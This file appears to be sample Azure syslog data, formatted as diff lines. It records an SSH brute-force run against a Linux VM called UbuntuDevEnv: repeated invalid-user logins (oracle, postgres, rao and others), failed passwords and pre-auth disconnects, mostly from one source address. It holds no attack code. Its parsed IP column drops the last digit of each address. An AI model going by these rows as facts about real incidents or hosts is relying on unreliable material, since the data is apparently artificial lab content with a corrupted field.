+12186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:25:52,UbuntuDevEnv,2019-06-26 02:25:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.60.39.61,99667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.60.39.6,,0,
+12187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:25:54,UbuntuDevEnv,2019-06-26 02:25:53,auth,UbuntuDevEnv,info,Failed password for invalid user minigames from 178.60.39.61 port 64865 ssh2,99667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minigames,178.60.39.6,64865,,
+12188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:25:54,UbuntuDevEnv,2019-06-26 02:25:53,auth,UbuntuDevEnv,info,Disconnected from invalid user minigames 178.60.39.61 port 64865 [preauth],99667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minigames,178.60.39.6,64865,,
+12189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:25:54,UbuntuDevEnv,2019-06-26 02:25:53,auth,UbuntuDevEnv,info,Received disconnect from 178.60.39.61 port 64865:11: Bye Bye [preauth],99667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.60.39.6,64865,,
+12190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:46:37,UbuntuDevEnv,2019-06-26 02:46:37,auth,UbuntuDevEnv,info,Connection closed by 117.239.69.117 port 59231 [preauth],104181,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,117.239.69.1,59231,,
+12191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:52:31,UbuntuDevEnv,2019-06-26 02:52:31,auth,UbuntuDevEnv,info,Invalid user rao from 43.242.215.70 port 4395,105518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rao,43.242.215.7,4395,,
+12192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:52:31,UbuntuDevEnv,2019-06-26 02:52:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,105518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:52:31,UbuntuDevEnv,2019-06-26 02:52:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,105518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:52:33,UbuntuDevEnv,2019-06-26 02:52:33,auth,UbuntuDevEnv,info,Failed password for invalid user rao from 43.242.215.70 port 4395 ssh2,105518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rao,43.242.215.7,4395,,
+12195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:52:33,UbuntuDevEnv,2019-06-26 02:52:33,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 4395:11: Bye Bye [preauth],105518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,4395,,
+12196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:52:33,UbuntuDevEnv,2019-06-26 02:52:33,auth,UbuntuDevEnv,info,Disconnected from invalid user rao 43.242.215.70 port 4395 [preauth],105518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rao,43.242.215.7,4395,,
+12197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:56:14,UbuntuDevEnv,2019-06-26 02:56:13,auth,UbuntuDevEnv,info,Invalid user n from 43.242.215.70 port 40359,106304,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,n,43.242.215.7,40359,,
+12198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:56:14,UbuntuDevEnv,2019-06-26 02:56:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,106304,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:56:14,UbuntuDevEnv,2019-06-26 02:56:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,106304,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:56:15,UbuntuDevEnv,2019-06-26 02:56:14,auth,UbuntuDevEnv,info,Failed password for invalid user n from 43.242.215.70 port 40359 ssh2,106304,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,n,43.242.215.7,40359,,
+12201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:56:15,UbuntuDevEnv,2019-06-26 02:56:15,auth,UbuntuDevEnv,info,Disconnected from invalid user n 43.242.215.70 port 40359 [preauth],106304,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,n,43.242.215.7,40359,,
+12202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:56:15,UbuntuDevEnv,2019-06-26 02:56:15,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 40359:11: Bye Bye [preauth],106304,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,40359,,
+12203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:58:02,UbuntuDevEnv,2019-06-26 02:58:01,auth,UbuntuDevEnv,info,Invalid user an from 43.242.215.70 port 29801,106682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,an,43.242.215.7,29801,,
+12204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:58:02,UbuntuDevEnv,2019-06-26 02:58:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,106682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:58:02,UbuntuDevEnv,2019-06-26 02:58:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,106682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:58:04,UbuntuDevEnv,2019-06-26 02:58:03,auth,UbuntuDevEnv,info,Failed password for invalid user an from 43.242.215.70 port 29801 ssh2,106682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,an,43.242.215.7,29801,,
+12207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:58:04,UbuntuDevEnv,2019-06-26 02:58:04,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 29801:11: Bye Bye [preauth],106682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,29801,,
+12208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:58:04,UbuntuDevEnv,2019-06-26 02:58:04,auth,UbuntuDevEnv,info,Disconnected from invalid user an 43.242.215.70 port 29801 [preauth],106682,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,an,43.242.215.7,29801,,
+12209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:59:57,UbuntuDevEnv,2019-06-26 02:59:57,auth,UbuntuDevEnv,info,Invalid user jeanmarc from 43.242.215.70 port 2690,107084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jeanmarc,43.242.215.7,2690,,
+12210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:59:58,UbuntuDevEnv,2019-06-26 02:59:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,107084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:59:58,UbuntuDevEnv,2019-06-26 02:59:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,107084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:00:00,UbuntuDevEnv,2019-06-26 03:00:00,auth,UbuntuDevEnv,info,Failed password for invalid user jeanmarc from 43.242.215.70 port 2690 ssh2,107084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jeanmarc,43.242.215.7,2690,,
+12213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:00:00,UbuntuDevEnv,2019-06-26 03:00:00,auth,UbuntuDevEnv,info,Disconnected from invalid user jeanmarc 43.242.215.70 port 2690 [preauth],107084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jeanmarc,43.242.215.7,2690,,
+12214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:00:00,UbuntuDevEnv,2019-06-26 03:00:00,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 2690:11: Bye Bye [preauth],107084,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,2690,,
+12215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:01:57,UbuntuDevEnv,2019-06-26 03:01:57,auth,UbuntuDevEnv,info,Invalid user bsd1 from 43.242.215.70 port 31308,107599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bsd1,43.242.215.7,31308,,
+12216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:01:57,UbuntuDevEnv,2019-06-26 03:01:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,107599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:01:57,UbuntuDevEnv,2019-06-26 03:01:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,107599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:02:00,UbuntuDevEnv,2019-06-26 03:01:59,auth,UbuntuDevEnv,info,Failed password for invalid user bsd1 from 43.242.215.70 port 31308 ssh2,107599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bsd1,43.242.215.7,31308,,
+12219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:02:00,UbuntuDevEnv,2019-06-26 03:02:00,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 31308:11: Bye Bye [preauth],107599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,31308,,
+12220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:02:00,UbuntuDevEnv,2019-06-26 03:02:00,auth,UbuntuDevEnv,info,Disconnected from invalid user bsd1 43.242.215.70 port 31308 [preauth],107599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bsd1,43.242.215.7,31308,,
+12221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:03:54,UbuntuDevEnv,2019-06-26 03:03:54,auth,UbuntuDevEnv,info,Invalid user reena from 43.242.215.70 port 41869,108007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,reena,43.242.215.7,41869,,
+12222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:03:54,UbuntuDevEnv,2019-06-26 03:03:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,108007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:03:54,UbuntuDevEnv,2019-06-26 03:03:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,108007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:03:56,UbuntuDevEnv,2019-06-26 03:03:56,auth,UbuntuDevEnv,info,Failed password for invalid user reena from 43.242.215.70 port 41869 ssh2,108007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,reena,43.242.215.7,41869,,
+12225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:03:56,UbuntuDevEnv,2019-06-26 03:03:56,auth,UbuntuDevEnv,info,Disconnected from invalid user reena 43.242.215.70 port 41869 [preauth],108007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,reena,43.242.215.7,41869,,
+12226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:03:56,UbuntuDevEnv,2019-06-26 03:03:56,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 41869:11: Bye Bye [preauth],108007,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,41869,,
+12227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:05:55,UbuntuDevEnv,2019-06-26 03:05:54,auth,UbuntuDevEnv,info,Invalid user mw from 43.242.215.70 port 45200,108431,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mw,43.242.215.7,45200,,
+12228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:05:55,UbuntuDevEnv,2019-06-26 03:05:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,108431,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:05:55,UbuntuDevEnv,2019-06-26 03:05:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,108431,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:05:57,UbuntuDevEnv,2019-06-26 03:05:57,auth,UbuntuDevEnv,info,Failed password for invalid user mw from 43.242.215.70 port 45200 ssh2,108431,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mw,43.242.215.7,45200,,
+12231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:05:57,UbuntuDevEnv,2019-06-26 03:05:57,auth,UbuntuDevEnv,info,Disconnected from invalid user mw 43.242.215.70 port 45200 [preauth],108431,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mw,43.242.215.7,45200,,
+12232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:05:57,UbuntuDevEnv,2019-06-26 03:05:57,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 45200:11: Bye Bye [preauth],108431,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,45200,,
+12233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:07:53,UbuntuDevEnv,2019-06-26 03:07:52,auth,UbuntuDevEnv,info,Invalid user oracle from 43.242.215.70 port 42160,108850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,43.242.215.7,42160,,
+12234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:07:53,UbuntuDevEnv,2019-06-26 03:07:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,108850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:07:53,UbuntuDevEnv,2019-06-26 03:07:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,108850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:07:55,UbuntuDevEnv,2019-06-26 03:07:55,auth,UbuntuDevEnv,info,Failed password for invalid user oracle from 43.242.215.70 port 42160 ssh2,108850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,43.242.215.7,42160,,
+12237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:07:55,UbuntuDevEnv,2019-06-26 03:07:55,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 42160:11: Bye Bye [preauth],108850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,42160,,
+12238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:07:55,UbuntuDevEnv,2019-06-26 03:07:55,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle 43.242.215.70 port 42160 [preauth],108850,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,43.242.215.7,42160,,
+12239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:09:47,UbuntuDevEnv,2019-06-26 03:09:46,auth,UbuntuDevEnv,info,Invalid user postgres from 43.242.215.70 port 18204,109241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,43.242.215.7,18204,,
+12240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:09:47,UbuntuDevEnv,2019-06-26 03:09:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=43.242.215.70,109241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,43.242.215.7,,0,
+12241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:09:47,UbuntuDevEnv,2019-06-26 03:09:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,109241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:09:49,UbuntuDevEnv,2019-06-26 03:09:48,auth,UbuntuDevEnv,info,Failed password for invalid user postgres from 43.242.215.70 port 18204 ssh2,109241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,43.242.215.7,18204,,
+12243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:09:49,UbuntuDevEnv,2019-06-26 03:09:48,auth,UbuntuDevEnv,info,Disconnected from invalid user postgres 43.242.215.70 port 18204 [preauth],109241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,43.242.215.7,18204,,
+12244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:09:49,UbuntuDevEnv,2019-06-26 03:09:48,auth,UbuntuDevEnv,info,Received disconnect from 43.242.215.70 port 18204:11: Bye Bye [preauth],109241,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,43.242.215.7,18204,,
+12245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 03:11:41,UbuntuDevEnv,2019-06-26 03:11:40,auth,UbuntuDevEnv,info,Invalid user ravi from 43.242.215.70 port 10802,109647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ravi,43.242.215.7,10802,,
